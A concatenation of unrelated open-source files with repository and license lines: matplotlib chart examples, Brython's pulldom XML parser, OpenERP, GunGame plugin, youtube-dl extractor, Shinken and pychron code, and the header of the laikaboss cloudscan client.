plt.axis([-5, 105, 0, 5]) # x-axis from -5 to 105,
# y-axis from 0 to 5
plt.xticks([10 * i for i in range(11)]) # x-axis labels at 0, 10, ..., 100
plt.xlabel("Decile")
plt.ylabel("# of Students")
plt.title("Distribution of Exam 1 Grades")
plt.show()
def make_chart_misleading_y_axis(plt, mislead=True):
mentions = [500, 505]
years = [2013, 2014]
plt.bar([2012.6, 2013.6], mentions, 0.8)
plt.xticks(years)
plt.ylabel("# of times I heard someone say 'data science'")
# if you don't do this, matplotlib will label the x-axis 0, 1
# and then add a +2.013e3 off in the corner (bad matplotlib!)
plt.ticklabel_format(useOffset=False)
if mislead:
# misleading y-axis only shows the part above 500
plt.axis([2012.5,2014.5,499,506])
plt.title("Look at the 'Huge' Increase!")
else:
plt.axis([2012.5,2014.5,0,550])
plt.title("Not So Huge Anymore.")
plt.show()
def make_chart_several_line_charts(plt):
variance = [1,2,4,8,16,32,64,128,256]
bias_squared = [256,128,64,32,16,8,4,2,1]
total_error = [x + y for x, y in zip(variance, bias_squared)]
xs = range(len(variance))
# we can make multiple calls to plt.plot
# to show multiple series on the same chart
plt.plot(xs, variance, 'g-', label='variance') # green solid line
plt.plot(xs, bias_squared, 'r-.', label='bias^2') # red dot-dashed line
plt.plot(xs, total_error, 'b:', label='total error') # blue dotted line
# because we've assigned labels to each series
# we can get a legend for free
# loc=9 means "top center"
plt.legend(loc=9)
plt.xlabel("model complexity")
plt.title("The Bias-Variance Tradeoff")
plt.show()
def make_chart_scatter_plot(plt):
friends = [ 70, 65, 72, 63, 71, 64, 60, 64, 67]
minutes = [175, 170, 205, 120, 220, 130, 105, 145, 190]
labels = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']
plt.scatter(friends, minutes)
# label each point
for label, friend_count, minute_count in zip(labels, friends, minutes):
plt.annotate(label,
xy=(friend_count, minute_count), # put the label with its point
xytext=(5, -5), # but slightly offset
textcoords='offset points')
plt.title("Daily Minutes vs. Number of Friends")
plt.xlabel("# of friends")
plt.ylabel("daily minutes spent on the site")
plt.show()
def make_chart_scatterplot_axes(plt, equal_axes=False):
test_1_grades = [ 99, 90, 85, 97, 80]
test_2_grades = [100, 85, 60, 90, 70]
plt.scatter(test_1_grades, test_2_grades)
plt.xlabel("test 1 grade")
plt.ylabel("test 2 grade")
if equal_axes:
plt.title("Axes Are Comparable")
plt.axis("equal")
else:
plt.title("Axes Aren't Comparable")
plt.show()
def make_chart_pie_chart(plt):
plt.pie([0.95, 0.05], labels=["Uses pie charts", "Knows better"])
# make sure pie is a circle and not an oval
plt.axis("equal")
plt.show()
if __name__ == "__main__":
make_chart_simple_line_chart(plt)
make_chart_simple_bar_chart(plt)
make_chart_histogram(plt)
make_chart_misleading_y_axis(plt, mislead=True)
make_chart_misleading_y_axis(plt, mislead=False)
make_chart_several_line_charts(plt)
make_chart_scatterplot_axes(plt, equal_axes=False)
make_chart_scatterplot_axes(plt, equal_axes=True)
make_chart_pie_chart(plt)
| unlicense |
40223117cda/2015_w11 | static/Brython3.1.0-20150301-090019/Lib/xml/dom/pulldom.py | 850 | 11761 | import xml.sax
import xml.sax.handler
START_ELEMENT = "START_ELEMENT"
END_ELEMENT = "END_ELEMENT"
COMMENT = "COMMENT"
START_DOCUMENT = "START_DOCUMENT"
END_DOCUMENT = "END_DOCUMENT"
PROCESSING_INSTRUCTION = "PROCESSING_INSTRUCTION"
IGNORABLE_WHITESPACE = "IGNORABLE_WHITESPACE"
CHARACTERS = "CHARACTERS"
class PullDOM(xml.sax.ContentHandler):
_locator = None
document = None
def __init__(self, documentFactory=None):
from xml.dom import XML_NAMESPACE
self.documentFactory = documentFactory
self.firstEvent = [None, None]
self.lastEvent = self.firstEvent
self.elementStack = []
self.push = self.elementStack.append
try:
self.pop = self.elementStack.pop
except AttributeError:
# use class' pop instead
pass
self._ns_contexts = [{XML_NAMESPACE:'xml'}] # contains uri -> prefix dicts
self._current_context = self._ns_contexts[-1]
self.pending_events = []
def pop(self):
result = self.elementStack[-1]
del self.elementStack[-1]
return result
def setDocumentLocator(self, locator):
self._locator = locator
def startPrefixMapping(self, prefix, uri):
if not hasattr(self, '_xmlns_attrs'):
self._xmlns_attrs = []
self._xmlns_attrs.append((prefix or 'xmlns', uri))
self._ns_contexts.append(self._current_context.copy())
self._current_context[uri] = prefix or None
def endPrefixMapping(self, prefix):
self._current_context = self._ns_contexts.pop()
def startElementNS(self, name, tagName , attrs):
# Retrieve xml namespace declaration attributes.
xmlns_uri = 'http://www.w3.org/2000/xmlns/'
xmlns_attrs = getattr(self, '_xmlns_attrs', None)
if xmlns_attrs is not None:
for aname, value in xmlns_attrs:
attrs._attrs[(xmlns_uri, aname)] = value
self._xmlns_attrs = []
uri, localname = name
if uri:
# When using namespaces, the reader may or may not
# provide us with the original name. If not, create
# *a* valid tagName from the current context.
if tagName is None:
prefix = self._current_context[uri]
if prefix:
tagName = prefix + ":" + localname
else:
tagName = localname
if self.document:
node = self.document.createElementNS(uri, tagName)
else:
node = self.buildDocument(uri, tagName)
else:
# When the tagname is not prefixed, it just appears as
# localname
if self.document:
node = self.document.createElement(localname)
else:
node = self.buildDocument(None, localname)
for aname,value in attrs.items():
a_uri, a_localname = aname
if a_uri == xmlns_uri:
if a_localname == 'xmlns':
qname = a_localname
else:
qname = 'xmlns:' + a_localname
attr = self.document.createAttributeNS(a_uri, qname)
node.setAttributeNodeNS(attr)
elif a_uri:
prefix = self._current_context[a_uri]
if prefix:
qname = prefix + ":" + a_localname
else:
qname = a_localname
attr = self.document.createAttributeNS(a_uri, qname)
node.setAttributeNodeNS(attr)
else:
attr = self.document.createAttribute(a_localname)
node.setAttributeNode(attr)
attr.value = value
self.lastEvent[1] = [(START_ELEMENT, node), None]
self.lastEvent = self.lastEvent[1]
self.push(node)
def endElementNS(self, name, tagName):
self.lastEvent[1] = [(END_ELEMENT, self.pop()), None]
self.lastEvent = self.lastEvent[1]
def startElement(self, name, attrs):
if self.document:
node = self.document.createElement(name)
else:
node = self.buildDocument(None, name)
for aname,value in attrs.items():
attr = self.document.createAttribute(aname)
attr.value = value
node.setAttributeNode(attr)
self.lastEvent[1] = [(START_ELEMENT, node), None]
self.lastEvent = self.lastEvent[1]
self.push(node)
def endElement(self, name):
self.lastEvent[1] = [(END_ELEMENT, self.pop()), None]
self.lastEvent = self.lastEvent[1]
def comment(self, s):
if self.document:
node = self.document.createComment(s)
self.lastEvent[1] = [(COMMENT, node), None]
self.lastEvent = self.lastEvent[1]
else:
event = [(COMMENT, s), None]
self.pending_events.append(event)
def processingInstruction(self, target, data):
if self.document:
node = self.document.createProcessingInstruction(target, data)
self.lastEvent[1] = [(PROCESSING_INSTRUCTION, node), None]
self.lastEvent = self.lastEvent[1]
else:
event = [(PROCESSING_INSTRUCTION, target, data), None]
self.pending_events.append(event)
def ignorableWhitespace(self, chars):
node = self.document.createTextNode(chars)
self.lastEvent[1] = [(IGNORABLE_WHITESPACE, node), None]
self.lastEvent = self.lastEvent[1]
def characters(self, chars):
node = self.document.createTextNode(chars)
self.lastEvent[1] = [(CHARACTERS, node), None]
self.lastEvent = self.lastEvent[1]
def startDocument(self):
if self.documentFactory is None:
import xml.dom.minidom
self.documentFactory = xml.dom.minidom.Document.implementation
def buildDocument(self, uri, tagname):
# Can't do that in startDocument, since we need the tagname
# XXX: obtain DocumentType
node = self.documentFactory.createDocument(uri, tagname, None)
self.document = node
self.lastEvent[1] = [(START_DOCUMENT, node), None]
self.lastEvent = self.lastEvent[1]
self.push(node)
# Put everything we have seen so far into the document
for e in self.pending_events:
if e[0][0] == PROCESSING_INSTRUCTION:
_,target,data = e[0]
n = self.document.createProcessingInstruction(target, data)
e[0] = (PROCESSING_INSTRUCTION, n)
elif e[0][0] == COMMENT:
n = self.document.createComment(e[0][1])
e[0] = (COMMENT, n)
else:
raise AssertionError("Unknown pending event ",e[0][0])
self.lastEvent[1] = e
self.lastEvent = e
self.pending_events = None
return node.firstChild
def endDocument(self):
self.lastEvent[1] = [(END_DOCUMENT, self.document), None]
self.pop()
def clear(self):
"clear(): Explicitly release parsing structures"
self.document = None
class ErrorHandler:
def warning(self, exception):
print(exception)
def error(self, exception):
raise exception
def fatalError(self, exception):
raise exception
class DOMEventStream:
def __init__(self, stream, parser, bufsize):
self.stream = stream
self.parser = parser
self.bufsize = bufsize
if not hasattr(self.parser, 'feed'):
self.getEvent = self._slurp
self.reset()
def reset(self):
self.pulldom = PullDOM()
# This content handler relies on namespace support
self.parser.setFeature(xml.sax.handler.feature_namespaces, 1)
self.parser.setContentHandler(self.pulldom)
def __getitem__(self, pos):
rc = self.getEvent()
if rc:
return rc
raise IndexError
def __next__(self):
rc = self.getEvent()
if rc:
return rc
raise StopIteration
def __iter__(self):
return self
def expandNode(self, node):
event = self.getEvent()
parents = [node]
while event:
token, cur_node = event
if cur_node is node:
return
if token != END_ELEMENT:
parents[-1].appendChild(cur_node)
if token == START_ELEMENT:
parents.append(cur_node)
elif token == END_ELEMENT:
del parents[-1]
event = self.getEvent()
def getEvent(self):
# use IncrementalParser interface, so we get the desired
# pull effect
if not self.pulldom.firstEvent[1]:
self.pulldom.lastEvent = self.pulldom.firstEvent
while not self.pulldom.firstEvent[1]:
buf = self.stream.read(self.bufsize)
if not buf:
self.parser.close()
return None
self.parser.feed(buf)
rc = self.pulldom.firstEvent[1][0]
self.pulldom.firstEvent[1] = self.pulldom.firstEvent[1][1]
return rc
def _slurp(self):
""" Fallback replacement for getEvent() using the
standard SAX2 interface, which means we slurp the
SAX events into memory (no performance gain, but
we are compatible to all SAX parsers).
"""
self.parser.parse(self.stream)
self.getEvent = self._emit
return self._emit()
def _emit(self):
""" Fallback replacement for getEvent() that emits
the events that _slurp() read previously.
"""
rc = self.pulldom.firstEvent[1][0]
self.pulldom.firstEvent[1] = self.pulldom.firstEvent[1][1]
return rc
def clear(self):
"""clear(): Explicitly release parsing objects"""
self.pulldom.clear()
del self.pulldom
self.parser = None
self.stream = None
class SAX2DOM(PullDOM):
def startElementNS(self, name, tagName , attrs):
PullDOM.startElementNS(self, name, tagName, attrs)
curNode = self.elementStack[-1]
parentNode = self.elementStack[-2]
parentNode.appendChild(curNode)
def startElement(self, name, attrs):
PullDOM.startElement(self, name, attrs)
curNode = self.elementStack[-1]
parentNode = self.elementStack[-2]
parentNode.appendChild(curNode)
def processingInstruction(self, target, data):
PullDOM.processingInstruction(self, target, data)
node = self.lastEvent[0][1]
parentNode = self.elementStack[-1]
parentNode.appendChild(node)
def ignorableWhitespace(self, chars):
PullDOM.ignorableWhitespace(self, chars)
node = self.lastEvent[0][1]
parentNode = self.elementStack[-1]
parentNode.appendChild(node)
def characters(self, chars):
PullDOM.characters(self, chars)
node = self.lastEvent[0][1]
parentNode = self.elementStack[-1]
parentNode.appendChild(node)
default_bufsize = (2 ** 14) - 20
def parse(stream_or_string, parser=None, bufsize=None):
if bufsize is None:
bufsize = default_bufsize
if isinstance(stream_or_string, str):
stream = open(stream_or_string, 'rb')
else:
stream = stream_or_string
if not parser:
parser = xml.sax.make_parser()
return DOMEventStream(stream, parser, bufsize)
def parseString(string, parser=None):
from io import StringIO
bufsize = len(string)
buf = StringIO(string)
if not parser:
parser = xml.sax.make_parser()
return DOMEventStream(buf, parser, bufsize)
| gpl-3.0 |
KousikaGanesh/purchaseandInventory | openerp/addons/sale_order_dates/__init__.py | 441 | 1071 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order_dates
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
GunGame-Dev-Team/GunGame-SP | addons/source-python/plugins/gungame/gungame.py | 1 | 6438 | # ../gungame/gungame.py
"""Weapon leveling game modification."""
# =============================================================================
# >> IMPORTS
# =============================================================================
# Python
from contextlib import suppress
from importlib import import_module
# Source.Python
from core import GAME_NAME
from cvars.tags import sv_tags
from engines.server import queue_command_string
from filters.entities import EntityIter
from listeners.tick import Delay
from translations.strings import LangStrings
# GunGame
from .info import info
from .core.config import load_all_configs
from .core.events.storage import gg_resource_list
from .core.logger import gg_logger
from .core.players.database import winners_database
from .core.plugins.command import gg_command_manager
from .core.rules import define_all_rules
from .core.settings import register_player_settings
from .core.sounds import register_all_sounds
from .core.status import GunGameMatchStatus, GunGameStatus
from .core.weapons.manager import weapon_order_manager
# =============================================================================
# >> GLOBAL VARIABLES
# =============================================================================
# Get the initialization strings
_base_strings = LangStrings('gungame/load_and_unload')
# =============================================================================
# >> LOAD & UNLOAD
# =============================================================================
def load():
"""Initialize GunGame."""
# Initialize GunGame logging
# TODO: Make sure to enable logging prior to the start message
current = 1
total = len([x for x in _base_strings if x.startswith('Initialize:')])
gg_logger.log_message(
_base_strings['Start:Initialize'].get_string(
version=info.version,
)
)
# Initialize GunGame weapon orders
gg_logger.log_message(
_base_strings['Initialize:Weapons'].get_string(
current=current,
total=total,
)
)
current += 1
weapon_order_manager.get_weapon_orders()
# Initialize GunGame events
gg_logger.log_message(
_base_strings['Initialize:Events'].get_string(
current=current,
total=total,
)
)
current += 1
gg_resource_list.register_all_events()
gg_resource_list.load_all_events()
# Initialize GunGame commands/menus
gg_logger.log_message(
_base_strings['Initialize:Commands'].get_string(
current=current,
total=total,
)
)
current += 1
from .core.commands.commands import find_all_commands, load_all_commands
find_all_commands()
load_all_commands()
# Initialize GunGame sounds
gg_logger.log_message(
_base_strings['Initialize:Sounds'].get_string(
current=current,
total=total,
)
)
current += 1
register_all_sounds()
# Initialize GunGame database
gg_logger.log_message(
_base_strings['Initialize:Database'].get_string(
current=current,
total=total,
)
)
current += 1
winners_database.load_database()
# Initialize GunGame configs
gg_logger.log_message(
_base_strings['Initialize:Configs'].get_string(
current=current,
total=total,
)
)
current += 1
load_all_configs()
# Initialize GunGame rules
gg_logger.log_message(
_base_strings['Initialize:Rules'].get_string(
current=current,
total=total,
)
)
current += 1
define_all_rules()
# Initialize GunGame player settings
gg_logger.log_message(
_base_strings['Initialize:Settings'].get_string(
current=current,
total=total,
)
)
current += 1
register_player_settings()
# Import the game specific functionality
gg_logger.log_message(
_base_strings['Initialize:Game'].get_string(
current=current,
total=total,
)
)
current += 1
with suppress(ImportError):
import_module(f'gungame.games.{GAME_NAME}')
# Add gungame to sv_tags
gg_logger.log_message(
_base_strings['Initialize:Tag'].get_string(
current=current,
total=total,
)
)
current += 1
sv_tags.add(info.name)
# Wait 1 tick to see if gg_start should be called
gg_logger.log_message(
_base_strings['End:Initialize'].get_string()
)
# Set the starting weapon convars
weapon_order_manager.set_start_convars()
# Set the match status to inactive now that the loading process is complete
GunGameStatus.MATCH = GunGameMatchStatus.INACTIVE
# Import the listeners/events/commands/menus
from .core.listeners import start_match
Delay(
delay=0,
callback=start_match,
)
def unload():
"""Clean up GunGame."""
# Start the cleanup process
GunGameStatus.MATCH = GunGameMatchStatus.UNLOADING
current = 1
total = len([x for x in _base_strings if x.startswith('Clean:')])
gg_logger.log_message(
_base_strings['Start:Clean'].get_string()
)
# Remove gungame from sv_tags
gg_logger.log_message(
_base_strings['Clean:Tag'].get_string(
current=current,
total=total,
)
)
current += 1
sv_tags.remove(info.name)
# Clean GunGame plugins
gg_logger.log_message(
_base_strings['Clean:Plugins'].get_string(
current=current,
total=total,
)
)
current += 1
gg_command_manager.unload_all_plugins()
# Clean GunGame commands/menus
gg_logger.log_message(
_base_strings['Clean:Commands'].get_string(
current=current,
total=total,
)
)
current += 1
from .core.commands.commands import unload_all_commands
unload_all_commands()
# Re-enable buyzones
gg_logger.log_message(
_base_strings['Clean:BuyZones'].get_string(
current=current,
total=total,
)
)
current += 1
for entity in EntityIter('func_buyzone'):
entity.enable()
# Restart the match
gg_logger.log_message(
_base_strings['End:Clean'].get_string()
)
queue_command_string('mp_restartgame 1')
| gpl-3.0 |
bastik/youtube-dl | youtube_dl/extractor/howcast.py | 95 | 1336 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import parse_iso8601
class HowcastIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?howcast\.com/videos/(?P<id>\d+)'
_TEST = {
'url': 'http://www.howcast.com/videos/390161-How-to-Tie-a-Square-Knot-Properly',
'md5': '8b743df908c42f60cf6496586c7f12c3',
'info_dict': {
'id': '390161',
'ext': 'mp4',
'title': 'How to Tie a Square Knot Properly',
'description': 'md5:dbe792e5f6f1489027027bf2eba188a3',
'timestamp': 1276081287,
'upload_date': '20100609',
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
embed_code = self._search_regex(
r'<iframe[^>]+src="[^"]+\bembed_code=([^\b]+)\b',
webpage, 'ooyala embed code')
return {
'_type': 'url_transparent',
'ie_key': 'Ooyala',
'url': 'ooyala:%s' % embed_code,
'id': video_id,
'timestamp': parse_iso8601(self._html_search_meta(
'article:published_time', webpage, 'timestamp')),
}
| unlicense |
lets-software/shinken | shinken/objects/matchingitem.py | 17 | 3991 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2014:
# Gabes Jean, naparuba@gmail.com
# Gerhard Lausser, Gerhard.Lausser@consol.de
# Gregory Starck, g.starck@gmail.com
# Hartmut Goebel, h.goebel@goebel-consult.de
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
'''
This is a utility class for factorizing matching functions for
discovery runners and rules.
'''
import re
from item import Item
class MatchingItem(Item):
# Try to see if the key,value is matching one or
# our rule. If value got ',' we must look for each value
# If one match, we quit
# We can find in matches or not_matches
def is_matching(self, key, value, look_in='matches'):
if look_in == 'matches':
d = self.matches
else:
d = self.not_matches
# If we do not even have the key, we bailout
if not key.strip() in d:
return False
# Get my matching pattern
m = d[key]
if ',' in m:
matchings = [mt.strip() for mt in m.split(',')]
else:
matchings = [m]
# Split the value by , too
values = value.split(',')
for m in matchings:
for v in values:
print "Try to match", m, v
# Maybe m is a list, if so should check one values
if isinstance(m, list):
for _m in m:
if re.search(_m, v):
return True
else:
if re.search(m, v):
return True
return False
# Look if we match all discovery data or not
# a disco data look as a list of (key, values)
def is_matching_disco_datas(self, datas):
# If we got not data, no way we can match
if len(datas) == 0:
return False
# First we look if it's possible to match
# we must match All self.matches things
for m in self.matches:
# print "Compare to", m
match_one = False
for (k, v) in datas.iteritems():
# We found at least one of our match key
if m == k:
if self.is_matching(k, v):
# print "Got matching with", m, k, v
match_one = True
continue
if not match_one:
# It match none
# print "Match none, False"
return False
# print "It's possible to be OK"
# And now look if ANY of not_matches is reach. If so
# it's False
for m in self.not_matches:
# print "Compare to NOT", m
match_one = False
for (k, v) in datas.iteritems():
# print "K,V", k,v
# We found at least one of our match key
if m == k:
# print "Go loop"
if self.is_matching(k, v, look_in='not_matches'):
# print "Got matching with", m, k, v
match_one = True
continue
if match_one:
# print "I match one, I quit"
return False
# Ok we match ALL rules in self.matches
# and NONE of self.not_matches, we can go :)
return True
| agpl-3.0 |
UManPychron/pychron | pychron/pipeline/plot/editors/graph_editor.py | 1 | 4674 | # ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import os
from chaco.plot_label import PlotLabel
from enable.component_editor import ComponentEditor as EnableComponentEditor
from traits.api import Property, Event, cached_property, Any
from traitsui.api import View, UItem
from pychron.core.helpers.iterfuncs import groupby_group_id
from pychron.pipeline.plot.editors.base_editor import BaseEditor
from pychron.pipeline.plot.figure_container import FigureContainer
class WarningLabel(PlotLabel):
def _layout_as_overlay(self, size=None, force=False):
self.x = self.component.x + self.component.width / 2
self.y = self.component.y + self.component.height / 2
class GraphEditor(BaseEditor):
refresh_needed = Event
save_needed = Event
component = Property(depends_on='refresh_needed')
basename = ''
figure_model = Any
figure_container = Any
@property
def analyses(self):
return self.items
def save_file(self, path, force_layout=True, dest_box=None):
_, tail = os.path.splitext(path)
if tail not in ('.pdf', '.png'):
path = '{}.pdf'.format(path)
c = self.component
'''
chaco becomes less responsive after saving if
use_backbuffer is false and using pdf
'''
from reportlab.lib.pagesizes import letter
c.do_layout(size=letter, force=force_layout)
_, tail = os.path.splitext(path)
if tail == '.pdf':
from pychron.core.pdf.save_pdf_dialog import myPdfPlotGraphicsContext
gc = myPdfPlotGraphicsContext(filename=path,
dest_box=dest_box)
gc.render_component(c, valign='center')
gc.save()
else:
from chaco.plot_graphics_context import PlotGraphicsContext
gc = PlotGraphicsContext((int(c.outer_width), int(c.outer_height)))
gc.render_component(c)
gc.save(path)
def set_items(self, ans, is_append=False, refresh=False, compress=True):
if is_append:
self.items.extend(ans)
else:
self.items = ans
if self.items:
self._set_name()
if compress:
self._compress_groups()
if refresh:
print('set items refresh')
self.refresh_needed = True
def _compress_groups(self):
ans = self.items
if ans:
for i, (gid, analyses) in enumerate(groupby_group_id(ans)):
for ai in analyses:
ai.group_id = i
@cached_property
def _get_component(self):
if self.items:
comp = self._component_factory()
else:
comp = self._no_component_factory()
return comp
def _component_factory(self):
raise NotImplementedError
def recalculate(self, model):
pass
def _get_component_hook(self, *args, **kw):
pass
def _no_component_factory(self):
container = self.figure_container
if not container:
container = FigureContainer()
self.figure_container = container
component = self.figure_container.component
w = WarningLabel(text='No Analyses',
font='Helvetica 36',
component=component)
component.overlays.append(w)
return component
def _component_factory(self):
raise NotImplementedError
def get_component_view(self):
return UItem('component',
style='custom',
# width=650,
editor=EnableComponentEditor())
def traits_view(self):
v = View(self.get_component_view(),
resizable=True)
return v
# ============= EOF =============================================
| apache-2.0 |
vjmac15/Lyilis | lib/youtube_dl/extractor/drtv.py | 9 | 8822 | # coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
ExtractorError,
int_or_none,
float_or_none,
mimetype2ext,
parse_iso8601,
remove_end,
update_url_query,
)
class DRTVIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv/se|nyheder|radio/ondemand)/(?:[^/]+/)*(?P<id>[\da-z-]+)(?:[/#?]|$)'
_GEO_BYPASS = False
_GEO_COUNTRIES = ['DK']
IE_NAME = 'drtv'
_TESTS = [{
'url': 'https://www.dr.dk/tv/se/boern/ultra/klassen-ultra/klassen-darlig-taber-10',
'md5': '7ae17b4e18eb5d29212f424a7511c184',
'info_dict': {
'id': 'klassen-darlig-taber-10',
'ext': 'mp4',
'title': 'Klassen - Dårlig taber (10)',
'description': 'md5:815fe1b7fa656ed80580f31e8b3c79aa',
'timestamp': 1471991907,
'upload_date': '20160823',
'duration': 606.84,
},
}, {
# embed
'url': 'https://www.dr.dk/nyheder/indland/live-christianias-rydning-af-pusher-street-er-i-gang',
'info_dict': {
'id': 'christiania-pusher-street-ryddes-drdkrjpo',
'ext': 'mp4',
'title': 'LIVE Christianias rydning af Pusher Street er i gang',
'description': 'md5:2a71898b15057e9b97334f61d04e6eb5',
'timestamp': 1472800279,
'upload_date': '20160902',
'duration': 131.4,
},
'params': {
'skip_download': True,
},
}, {
# with SignLanguage formats
'url': 'https://www.dr.dk/tv/se/historien-om-danmark/-/historien-om-danmark-stenalder',
'info_dict': {
'id': 'historien-om-danmark-stenalder',
'ext': 'mp4',
'title': 'Historien om Danmark: Stenalder (1)',
'description': 'md5:8c66dcbc1669bbc6f873879880f37f2a',
'timestamp': 1490401996,
'upload_date': '20170325',
'duration': 3502.04,
'formats': 'mincount:20',
},
'params': {
'skip_download': True,
},
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
if '>Programmet er ikke længere tilgængeligt' in webpage:
raise ExtractorError(
'Video %s is not available' % video_id, expected=True)
video_id = self._search_regex(
(r'data-(?:material-identifier|episode-slug)="([^"]+)"',
r'data-resource="[^>"]+mu/programcard/expanded/([^"]+)"'),
webpage, 'video id')
programcard = self._download_json(
'http://www.dr.dk/mu/programcard/expanded/%s' % video_id,
video_id, 'Downloading video JSON')
data = programcard['Data'][0]
title = remove_end(self._og_search_title(
webpage, default=None), ' | TV | DR') or data['Title']
description = self._og_search_description(
webpage, default=None) or data.get('Description')
timestamp = parse_iso8601(data.get('CreatedTime'))
thumbnail = None
duration = None
restricted_to_denmark = False
formats = []
subtitles = {}
for asset in data['Assets']:
kind = asset.get('Kind')
if kind == 'Image':
thumbnail = asset.get('Uri')
elif kind in ('VideoResource', 'AudioResource'):
duration = float_or_none(asset.get('DurationInMilliseconds'), 1000)
restricted_to_denmark = asset.get('RestrictedToDenmark')
asset_target = asset.get('Target')
for link in asset.get('Links', []):
uri = link.get('Uri')
if not uri:
continue
target = link.get('Target')
format_id = target or ''
preference = None
if asset_target in ('SpokenSubtitles', 'SignLanguage'):
preference = -1
format_id += '-%s' % asset_target
if target == 'HDS':
f4m_formats = self._extract_f4m_formats(
uri + '?hdcore=3.3.0&plugin=aasp-3.3.0.99.43',
video_id, preference, f4m_id=format_id, fatal=False)
if kind == 'AudioResource':
for f in f4m_formats:
f['vcodec'] = 'none'
formats.extend(f4m_formats)
elif target == 'HLS':
formats.extend(self._extract_m3u8_formats(
uri, video_id, 'mp4', entry_protocol='m3u8_native',
preference=preference, m3u8_id=format_id,
fatal=False))
else:
bitrate = link.get('Bitrate')
if bitrate:
format_id += '-%s' % bitrate
formats.append({
'url': uri,
'format_id': format_id,
'tbr': int_or_none(bitrate),
'ext': link.get('FileFormat'),
'vcodec': 'none' if kind == 'AudioResource' else None,
})
subtitles_list = asset.get('SubtitlesList')
if isinstance(subtitles_list, list):
LANGS = {
'Danish': 'da',
}
for subs in subtitles_list:
if not subs.get('Uri'):
continue
lang = subs.get('Language') or 'da'
subtitles.setdefault(LANGS.get(lang, lang), []).append({
'url': subs['Uri'],
'ext': mimetype2ext(subs.get('MimeType')) or 'vtt'
})
if not formats and restricted_to_denmark:
self.raise_geo_restricted(
'Unfortunately, DR is not allowed to show this program outside Denmark.',
countries=self._GEO_COUNTRIES)
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'timestamp': timestamp,
'duration': duration,
'formats': formats,
'subtitles': subtitles,
}
class DRTVLiveIE(InfoExtractor):
IE_NAME = 'drtv:live'
_VALID_URL = r'https?://(?:www\.)?dr\.dk/(?:tv|TV)/live/(?P<id>[\da-z-]+)'
_GEO_COUNTRIES = ['DK']
_TEST = {
'url': 'https://www.dr.dk/tv/live/dr1',
'info_dict': {
'id': 'dr1',
'ext': 'mp4',
'title': 're:^DR1 [0-9]{4}-[0-9]{2}-[0-9]{2} [0-9]{2}:[0-9]{2}$',
},
'params': {
# m3u8 download
'skip_download': True,
},
}
def _real_extract(self, url):
channel_id = self._match_id(url)
channel_data = self._download_json(
'https://www.dr.dk/mu-online/api/1.0/channel/' + channel_id,
channel_id)
title = self._live_title(channel_data['Title'])
formats = []
for streaming_server in channel_data.get('StreamingServers', []):
server = streaming_server.get('Server')
if not server:
continue
link_type = streaming_server.get('LinkType')
for quality in streaming_server.get('Qualities', []):
for stream in quality.get('Streams', []):
stream_path = stream.get('Stream')
if not stream_path:
continue
stream_url = update_url_query(
'%s/%s' % (server, stream_path), {'b': ''})
if link_type == 'HLS':
formats.extend(self._extract_m3u8_formats(
stream_url, channel_id, 'mp4',
m3u8_id=link_type, fatal=False, live=True))
elif link_type == 'HDS':
formats.extend(self._extract_f4m_formats(update_url_query(
'%s/%s' % (server, stream_path), {'hdcore': '3.7.0'}),
channel_id, f4m_id=link_type, fatal=False))
self._sort_formats(formats)
return {
'id': channel_id,
'title': title,
'thumbnail': channel_data.get('PrimaryImageUri'),
'formats': formats,
'is_live': True,
}
| gpl-3.0 |
ruo91/laikaboss | cloudscan.py | 10 | 20885 | #!/usr/bin/python
# Copyright 2015 Lockheed Martin Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Copyright Lockheed Martin 2015
#
# A networked client for the laikaboss framework.
# Must have an instance of laikad running locally or on a server
# accessible by this client over ssh.
#
# This client is based on the ZeroMQ Lazy Pirate pattern
#
from multiprocessing import Process, Queue
import os, sys, time, logging, select
import getpass
